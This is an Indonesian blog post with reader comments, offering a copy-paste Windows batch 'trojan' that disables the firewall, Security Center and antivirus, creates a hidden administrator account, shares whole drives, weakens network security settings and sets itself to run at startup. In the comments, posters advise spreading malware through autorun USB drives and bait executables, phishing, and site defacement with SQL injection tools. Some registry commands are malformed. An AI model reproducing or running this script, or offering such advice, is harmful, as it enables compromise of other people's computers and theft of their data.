MEMBUAT VIRUS TROJAN dengan NOTEPAD

share TROJAN versi batch

by :yky_screamo

Berjumpa lagi dengan saya,kali ini aku mau share tentang

cara buat simple trojan versi batch jadi buatnya mudah

dengan berbekal notepad aj bro
jadi nanti di save dengan ekstensi .bat

siiip,,,check this out

masukkan koding berikut..cukup di copas aj..

@echo off
color 0a
cls
IF not exist %windir%\%0 copy %0 %windir%
netsh firewall set opmode=disable
net stop ShareAccess
Net stop “Security Center”
Tskill *AV*
NET USER admin admin123  /ADD
NET LOCAL GROUP ADMINISTRATORS admin /ADD
Reg ADD “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ SpecialAccounts \UserList” /v”admin” /t REG_DWORD/d 0 /f
REG ADD HKLM\SYSTEM\ControlSet001\Services\Messenger /v Start /t REG_DWORD /d 2/f
Net start messenger
dir *.*>>Filelist.txt
Net send 192.168.1.100 >hasil.txt
NET SHARE system=%SYSTEMDRIVE% /UNLIMITED
NET SHARE data1=D:\ /UNLIMITED
NET SHARE data1=E:\ /UNLIMITED
REG ADD HKCR\Network\SharingHandler /ve /t REG_SZ/d “”/f
REG ADD HKLD\SYSTEM\CurrentControlSet\LSA /v forceguest /t REG_DWORD /d 0 /f
REG ADD HKLD\SYSTEM\CurrentControlSet\LSA /v restrictanonymous /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\ControlSet001\Services\TIntSvr /v Start /t REG_DWORD /d 2/f
Net start tIntsvr
REG ADD HKLM\Software\Microsoft\Windows\pCurrentVersion\Run\v Eksplorer /t REG_SZ /d %windir%\trojan2.bat /f
REG ADD HKCU\Software\Microsoft\Windows\pCurrentVersion\Run\v Eksplorer /t REG_SZ /d %windir%\trojan2.bat /f

efek diantaranya adalah :

-penyebaran seperti worm jadi mudah berkembang biak
-disable firewall
-stop ShareAccess
-stop Security Center
-nge kill AV
-membuat user dengan nama admin123
-pertahanan pada user admin123
-menjalankan messenger
-mengirim kan hasil rekaman ke ip 192.168.1.100

dan terakhir listing ttg pertahan trojan ini.
hadeh,.capek jga,..jgn lpa di ksh cendolny yah..
klo mw tw cra “healnya” silakan tny ke kotak komentar aj.//

Categories: VIRUS dan WORM | 25 Comments

Post navigation

25 thoughts on “MEMBUAT VIRUS TROJAN dengan NOTEPAD

  1. bagus

    bng aq kurang faham ne

    • kyknya sih udh mudah x lah itu bagus,..
      cra bwtny dimulai dri : buka komputer -all program-acesorries-notepad.
      nah tinggal di copy-paste aj tuh dimulai dri tulisan yg gk jelas itu,..
      itu tulisan kode pada komputer,yang nantinya dapat menjadi suatu program,.yg dinamakan virus trojan/troya.

  2. Mario_gamers

    waH…
    agan UDh seram ENE permainannya,….
    TPi mantap LAh,…
    keep posting yah GAn…

  3. karin lovedubu

    tinggal di copas ajja kan bg??
    ini virus termasuk yg bandel gx??
    wahhh bg hebat mah bisa bikin viru😀
    terus share ya bg

  4. Cra benerinya Gimana,..?
    w da kna nih..

  5. adi

    mas boz bisa kasih tw cara penawar virusnya gk,,, ???

    mohon balasannya boz😀

  6. masrur

    bos saya mu t?
    saya ingin menjadi serang hacker gmn cranya?

    • tidak ada di universitas manapun dipelajari tentang hacking,.kecuali keamanan data,.
      klo menurut saya, sebaiknya anda mulai dari mengikuti forum forum tentang hacking,karena menurut saya,belajar hacking itu otodidak,ada niat ada jalan,. semoga membantu😀

    • nih ane kasih tau caranya
      Pertama ente harus melakukan dari hal yg lebih kecil dulu seperti Berfikir untuk percaya diri dan Niat untuk jadi hacker
      dan yg kedua harus tau tentang Ip/Proxy untuk keamanan agar gak dilacak oleh Interpol so Jadi Hacker itu Extreme bro
      dan yg Ketiga mending Deface Web dulu yg mudah sblm jenjang ke lebih tinggi lagi dan jangan lupa klo mau Deface Web harus paham dengan Software yg dipake ,Contoh Software : Havij 1.15 pro, SQLMap,SQLi Dumper dll
      @Newbee_free

      Tapi ente haru Pikir-pikir lagi deh buat Resiko nya

      #THINKAGAIN

  7. gimana cara normalin nya saat udh kena virus ini nya gan ??
    tolong di kasih tau yah gan,

  8. kode Virus Conficker ada g?
    klo Worm Conficker A sama B udah d upgrade ma ana tapi yg C aja yg g ada Code nya.
    trs klo aktivin virsu Recyler,Smansa,HellSpawn kaya gmna?

    • -biasanya klo untuk mengaktifkan virus dapat menggunakan file yang menjebak seperti format .exe (buat judul file yang menarik korban) dan format .bat juga bisa dijadikan hal yang merugikan.

      -Menggunakan autorun jga bisa Gan,. Anda Di Flashdisk dapat menggunakan autorun gan,.Cek Di google banyak kok cara membuat skript autorun, cara kerjanya akan otomatis berjalan jika FD dicolokkan ke komputer orng lain,..🙂
      semoga membantu,

  9. Masih Ngeri Sama Efeknya Gan :3

    • Sebelum Bikin Virus Recommended Banget Buat Make Aplikasi” Deep Freeze ” Gan,. :)berfungsi mengembalikan sistem kesemula.
      Kebetulan gak Updet artikel Deepfreze Di Google Banyak Gan Petunjuk Pemakaian Dan Manfaatnya,.
      semoga Membantu😀

  10. ada virus yang tidak terdeteksi antivirus, bisa mematikan Deep frezee dan mengandalikan komputer korban?

    • Mungkin ini Jawabannya Gan,,
      Virus Masuk Karena Human Error (Kesalahan User) Balik Dlm ambil Keputusan maupun Knowledge,.,
      Jadi KLo seorang korban Tidak Terlalu paham komputer Sangat Mudah Diberikan Virus ,. maupun mengendallikan Komputer korban.

  11. Kang mau nanya, gimana cara masuk ke komputer a, dan melihat data… dan meninggalkan pesan…

    • Seperti Apa Dulu contoh Kasusnya Gan,..?
      Klo melalui WiFFi Bisa Dilakukan,Bisa Melihat Data Bahkan Masuk Ke KOmputer A,.
      Dengan syarat Satu Jaringan WIFFI yah,.Untuk Tutorial nya,.Saya Gak bisa Beberkan gan,.
      hanya melalui beberapa aplikasi Pendukung,.Wireshark,miner ,.Taraaa!! haha,.masuk melalui Profile Komputer😉
      sperti itu gambarannya…
      Nah,. Klo Melalui Website,.,Saya Rasa Cukup Sulit Dilakukan Untuk Masuk Ke komputer korban (Victim).
      kecuali BErhasil memancing korban kedalam Suatu Phising Kita (rekayasa).

  12. Victor

    Mau tanya dong, kalau kita ud masuk kan virus ke dalam komputer target lewat usb atau sebagai nya. Gmn kita bisa liat data nya?

  13. Victory Joo

    Mau tanya dong, kalau kita sudah menjalankan virus ke dalam komputer target misalnya menggunakan usb atau sebagainya. Bagaimana kita bisa melihat data yang ada dari komputer target

Caution..!! Don't Spam,.Do you have a Comment,?Write Here. ^_^

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Create a free website or blog at WordPress.com.

%d bloggers like this: